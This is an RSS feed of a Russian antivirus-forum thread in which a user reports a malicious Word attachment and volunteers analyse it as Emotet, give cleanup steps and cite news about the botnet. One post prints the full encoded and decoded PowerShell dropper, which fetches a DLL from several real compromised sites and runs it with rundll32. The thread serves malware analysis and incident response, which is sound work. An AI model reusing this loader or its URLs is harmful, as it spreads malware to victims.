<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: WORD с макросом]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме WORD с макросом форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Sat, 02 May 2026 05:59:14 +0300</pubDate>
		<item>
			<title>WORD с макросом</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16266/message111518/">WORD с макросом</a></b> <i>Win32/Emotet.gen</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<noindex><a href="https://app.any.run/tasks/b8e10aa1-e3d9-4f6f-86fc-e428c9359537" target="_blank" rel="nofollow">https://app.any.run/tasks/b8e10aa1-e3d9-4f6f-86fc-e428c9359537</a></noindex><br /><br />"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ARC 2020_12_29 MC57559.doc"<br /><br />+<br /><br />====quote====<br />cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9<WBR/>&shy;AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUA<WBR/>&shy;bQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAs<WBR/>&shy;ACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkA<WBR/>&shy;cABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9<WBR/>&shy;AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0A<WBR/>&shy;LgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAn<WBR/>&shy;ACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUA<WBR/>&shy;UgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBl<WBR/>&shy;AGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsA<WBR/>&shy;JwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBv<WBR/>&shy;AG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAA<WBR/>&shy;cABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAAr<WBR/>&shy;ACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8A<WBR/>&shy;JwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBs<WBR/>&shy;AGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoA<WBR/>&shy;IgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABI<WBR/>&shy;AE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsA<WBR/>&shy;JwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAn<WBR/>&shy;AGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAA<WBR/>&shy;WwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwAr<WBR/>&shy;ACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEA<WBR/>&shy;cgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBD<WBR/>&shy;AFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcA<WBR/>&shy;VABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAo<WBR/>&shy;ACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAA<WBR/>&shy;KAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAn<WBR/>&shy;ACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQA<WBR/>&shy;SABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAn<WBR/>&shy;ACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgA<WBR/>&shy;JwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBb<WBR/>&shy;AEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQA<WBR/>&shy;JwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0<WBR/>&shy;ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsA<WBR/>&shy;KAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBs<WBR/>&shy;ACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcA<WBR/>&shy;KwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAn<WBR/>&shy;ACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsA<WBR/>&shy;KAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAw<WBR/>&shy;ACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsA<WBR/>&shy;JwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBu<WBR/>&shy;AC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcA<WBR/>&shy;QABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQAr<WBR/>&shy;ACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0A<WBR/>&shy;JwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBw<WBR/>&shy;ACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4A<WBR/>&shy;dAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQAr<WBR/>&shy;ACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgA<WBR/>&shy;JwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAn<WBR/>&shy;AGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcA<WBR/>&shy;KQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAn<WBR/>&shy;ACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcA<WBR/>&shy;LwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBj<WBR/>&shy;AG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQA<WBR/>&shy;JwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwAr<WBR/>&shy;ACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoA<WBR/>&shy;JwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0<WBR/>&shy;ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMA<WBR/>&shy;bwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAn<WBR/>&shy;AGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYA<WBR/>&shy;WAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6<WBR/>&shy;AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcA<WBR/>&shy;YQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAu<WBR/>&shy;AGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEA<WBR/>&shy;ZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAn<WBR/>&shy;ACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUA<WBR/>&shy;IgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBh<WBR/>&shy;AHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsA<WBR/>&shy;KAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAi<WBR/>&shy;AHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAA<WBR/>&shy;cABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1<WBR/>&shy;ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQA<WBR/>&shy;WQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdABy<WBR/>&shy;AHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQA<WBR/>&shy;JwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBU<WBR/>&shy;ACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkA<WBR/>&shy;ZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBI<WBR/>&shy;AD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgA<WBR/>&shy;KAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBu<WBR/>&shy;ADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQA<WBR/>&shy;MQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAn<WBR/>&shy;ACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcA<WBR/>&shy;KwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAn<WBR/>&shy;ACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsA<WBR/>&shy;JABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBr<WBR/>&shy;ADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkA<WBR/>&shy;KQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAo<WBR/>&shy;ACcAOAAnACsAJwA4AEoAJwApACkA <br />=============<br /><br />+<br />in /v Word experienced an error trying to open the file. <br />+<br />раскодированный скрипт:<br /><br />====quote====<br />POwersheLL -w hidden &nbsp; $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY')  ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR')  ;  $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V');  ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f  [cHaR]92));$N95W=(('S'+'28')+'S');  (  Ls  vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'+'2[')+'s'),([array]('sd','sw'),('h'+('tt'+'p')),'3d')[1])."s`pLIT"($E__V + $Ytd_ppb + $C54Y);$J37V=(('G5'+'2')+'C');foreach ($Yfpdvur in $Ile_vaa){try{(.('New-'+'Ob'+'ject') SYstem.nEt.webcLiEnT)."DoW`N`l`oadfIle"($Yfpdvur, $Zc7n7y_);$W02H=('C'+('59'+'X'));If ((.('Get-I'+'tem') $Zc7n7y_)."LEnG`TH" -ge 38413) {.('r'+'un'+'dll32') $Zc7n7y_,('Co'+('nt'+'ro')+('l_R'+'u'+'nDL')+'L')."tost`R`ING"();$U78W=('M0'+'1N');break;$F24T=('K'+('3'+'8L'))}}catch{}}$A31I=('V'+('8'+'8J'))<br />=============<br /><br />+<br />====quote====<br /><br /><br />"C:\Windows\system32\rundll32.exe" C:\Users\admin\Nsghoht\Gbh5r9o\Q27V.dll Control_RunDLL<br />=============<br />+<br />====quote====<br /><br />C:\Windows\system32\rundll32.exe "C:\Users\admin\AppData\Local\Vcfjrqyglb\qernwsuxr.kiv",Control_RunDLL<br /><br />=============<br /><noindex><a href="https://www.virustotal.com/gui/file/f7440143fa4180db96d5e22f38a07fab5fd56f4912e542bdd8e0a3dc65fc5f68/detection" target="_blank" rel="nofollow">https://www.virustotal.com/gui/file/f7440143fa4180db96d5e22f38a07fab5fd56f4912e542b<WBR/>&shy;dd8e0a3dc65fc5f68/detection</a></noindex><br />+<br /><br />====quote====<br />"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" <br />=============<br /> <br />
			<i>01.01.2021 18:56:44, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16266/message111518/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16266/message111518/</guid>
			<pubDate>Fri, 01 Jan 2021 18:56:44 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>WORD с макросом</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16266/message111517/">WORD с макросом</a></b> <i>Win32/Emotet.gen</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_oJT5rhHN" href="/user/997/" bx-tooltip-user-id="997">RP55 RP55</a> написал:<br />модифицированный Win32/Emotet.gen троянская программа<br />=============<br /><br />После полуторамесячного перерыва ботнет Emotet был возрожден 21 декабря [1, 2], и Microsoft заметила продолжающуюся кампанию, доставляющую «широкий спектр приманок в виде огромных объемов электронных писем, использования поддельных ответов или переадресации. электронные письма, защищенные паролем вложения архива ".<br /><br />«В новой кампании Emotet по-прежнему используются документы, содержащие вредоносный макрос, который при включении подключается к семи вредоносным доменам для загрузки полезной нагрузки Emotet», - написала в Твиттере Microsoft Security Intelligence.<br /><br />Emotet был впервые обнаружен в 2014 году как банковский троянец и теперь превратился в ботнет, используемый группой угроз TA542 (также известной как Mummy Spider) для развертывания вредоносных программ второго уровня в зараженных системах.<br /><br />Полезные данные, которые Emotet сбрасывает на взломанные компьютеры, включают троянские программы QakBot и Trickbot (которые также развертывают программы-вымогатели Ryuk и Conti). <br />
			<i>01.01.2021 18:35:55, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16266/message111517/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16266/message111517/</guid>
			<pubDate>Fri, 01 Jan 2021 18:35:55 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>WORD с макросом</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16266/message111488/">WORD с макросом</a></b> <i>Win32/Emotet.gen</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br />Время;Модуль сканирования;Тип объекта;Объект;Обнаружение;Действие;Пользователь;Информация;Хэш;Первое обнаружение здесь<br />29.12.2020 11:59:38;Фильтр HTTP;файл; wheelcomoving.com/p/RuMeRPa;вероятно, модифицированный Win32/Emotet.gen троянская программа;подключение завершено;ANDREW\Admin;Событие произошло при попытке доступа к Интернету следующим приложением: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <br />=============<br /><br /><br />Анализ одного из сайтов: wheelcomoving.com/p/RuMeRPa<br /><br /><noindex><a href="https://urlhaus.abuse.ch/url/944378/" target="_blank" rel="nofollow">https://urlhaus.abuse.ch/url/944378/</a></noindex><br /><noindex><a href="https://www.virustotal.com/gui/url/62f9d2b7e74fdf07456084d5b1907bbe6ce4ac300a3d609e18b51984a5056722/detection" target="_blank" rel="nofollow">https://www.virustotal.com/gui/url/62f9d2b7e74fdf07456084d5b1907bbe6ce4ac300a3d609e<WBR/>&shy;18b51984a5056722/detection</a></noindex><br /><br />Видимо зверь пытался подключиться к ресурсу и скачать дополнительную "полезную" нагрузку. <br />
			<i>29.12.2020 18:16:30, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16266/message111488/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16266/message111488/</guid>
			<pubDate>Tue, 29 Dec 2020 18:16:30 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>WORD с макросом</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16266/message111485/">WORD с макросом</a></b> <i>Win32/Emotet.gen</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			отправил <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118339">Лог.txt</a><br /><i>29.12.2020 17:59:15, Андрей Сергеев.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16266/message111485/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16266/message111485/</guid>
			<pubDate>Tue, 29 Dec 2020 17:59:15 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>WORD с макросом</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16266/message111482/">WORD с макросом</a></b> <i>Win32/Emotet.gen</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_83e4UZ2D" href="/user/31475/" bx-tooltip-user-id="31475">Андрей Сергеев</a> написал:<br />(Подозрительный файл отправил через спец.форму на Вашем сайте).<br />=============<br />пришлите данный файл в почту safety@chklst.ru для проверки, лучше в архиве с паролем infected<br />+<br />добавьте лог журнала обнаружения угроз <br />
			<i>29.12.2020 16:45:37, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16266/message111482/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16266/message111482/</guid>
			<pubDate>Tue, 29 Dec 2020 16:45:37 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>WORD с макросом</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16266/message111481/">WORD с макросом</a></b> <i>Win32/Emotet.gen</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Выполнил. <br />Судя по журналу обнаружения антивируса ESET, была попытка скачать несколько вредоносных программ, но антивирус это заблокировал.<br />Работает все отлично.<br />Спасибо! <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118335">AdwCleaner[C00].txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118336">Fixlog.txt</a><br /><i>29.12.2020 16:32:26, Андрей Сергеев.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16266/message111481/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16266/message111481/</guid>
			<pubDate>Tue, 29 Dec 2020 16:32:26 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>WORD с макросом</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16266/message111479/">WORD с макросом</a></b> <i>Win32/Emotet.gen</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Вирусов не увидел.<br />Немного мусора и есть изменения в политиках. &nbsp;( если изменения в политики вносили сами - скрипт можно не выполнять )<br /><br /><br />Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:<br />...<br />Запустите FRST и нажмите один раз на кнопку Fix и подождите. <br /><br />
====code====
<pre>&nbsp;&nbsp;

ContextMenuHandlers1: &#91;7-Zip&#93; -&#62; {23170F69-40C1-278A-1000-000100020000} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers1: &#91;ANotepad++64&#93; -&#62; {B298D29A-A6ED-11DE-BA8C-A68E55D89593} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers1: &#91;BriefcaseMenu&#93; -&#62; {85BBD920-42A0-1069-A2E4-08002B30309D} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers1: &#91;WorkFolders&#93; -&#62; {E61BF828-5E63-4287-BEF1-60B1A4FDE0E3} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers3: &#91;{4A7C4306-57E0-4C0C-83A9-78C1528F618C}&#93; -&#62; {4A7C4306-57E0-4C0C-83A9-78C1528F618C} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers4: &#91;7-Zip&#93; -&#62; {23170F69-40C1-278A-1000-000100020000} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers4: &#91;WorkFolders&#93; -&#62; {E61BF828-5E63-4287-BEF1-60B1A4FDE0E3} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers5: &#91;igfxcui&#93; -&#62; {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =&#62;&nbsp;&nbsp;-&#62; No File
ContextMenuHandlers6: &#91;BriefcaseMenu&#93; -&#62; {85BBD920-42A0-1069-A2E4-08002B30309D} =&#62;&nbsp;&nbsp;-&#62; No File
HKLM&#92;SOFTWARE&#92;Policies&#92;Microsoft&#92;Windows Defender: Restriction &#60;==== ATTENTION
GroupPolicy: Restriction ? &#60;==== ATTENTION
Policies: C:&#92;ProgramData&#92;NTUSER.pol: Restriction &#60;==== ATTENTION
Policies: C:&#92;Users&#92;Все пользователи&#92;NTUSER.pol: Restriction &#60;==== ATTENTION
HKLM&#92;SOFTWARE&#92;Policies&#92;Microsoft&#92;Internet Explorer: Restriction &#60;==== ATTENTION
HKU&#92;S-1-5-19&#92;SOFTWARE&#92;Policies&#92;Microsoft&#92;Internet Explorer: Restriction &#60;==== ATTENTION
HKU&#92;S-1-5-20&#92;SOFTWARE&#92;Policies&#92;Microsoft&#92;Internet Explorer: Restriction &#60;==== ATTENTION
HKU&#92;S-1-5-21-1585131043-1017290590-1199785018-1000&#92;SOFTWARE&#92;Policies&#92;Microsoft&#92;Internet Explorer: Restriction &#60;==== ATTENTION

EmptyTemp:
Reboot:

</pre>
=============
<br />Программа FRST создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!<br /><br />+<br />Выполните лог в AdwCleaner<br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic7084/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic7084/</a></noindex><br /><br />после завершения сканирования:<br />Записи относящиеся к Mail.Ru и Yandex можете не удалять ( если пользуетесь программой )<br />На вкладке:<br />Папки (Folders) для Mail.Ru &nbsp;и Yandex снимите [V]<br /><br /><br />Удалите найденное в AdwCleaner по кнопке Очистить (Clean), подтвердите действие<br />с автоперезагрузкой<br /><br /><br /><br />Проверяем, как работает система...<br />и<br />Пишем по _общему результату. <br />
			<i>29.12.2020 13:53:48, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16266/message111479/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16266/message111479/</guid>
			<pubDate>Tue, 29 Dec 2020 13:53:48 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>WORD с макросом</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16266/message111478/">WORD с макросом</a></b> <i>Win32/Emotet.gen</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Логи FRST <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118330">Addition.txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118331">FRST.txt</a><br /><i>29.12.2020 12:42:50, Андрей Сергеев.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16266/message111478/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16266/message111478/</guid>
			<pubDate>Tue, 29 Dec 2020 12:42:50 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>WORD с макросом</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16266/message111477/">WORD с макросом</a></b> <i>Win32/Emotet.gen</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Добрый день!<br />Пришло письмо с файлом Word, от "известного" отправителя (сначала пишет якобы настоящий адрес, а справа <noindex><a href="mailto:assistenzabck@saetpd.it" target="_blank" rel="nofollow">assistenzabck@saetpd.it</a></noindex>.<br />Ворд запакован был в архив с паролем (пароль был в письме). При открытии Ворда, запустилась на несколько секунд командная строка. <br />ПК ведет себя как обычно. <br />(Подозрительный файл отправил через спец.форму на Вашем сайте).<br />Образ прикрепил, проверьте пожалуйста ПК)<br />Спасибо! <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118329">ANDREW_2020-12-29_12-28-14_v4.11.rar</a><br /><i>29.12.2020 12:33:43, Андрей Сергеев.</i>]]></description>
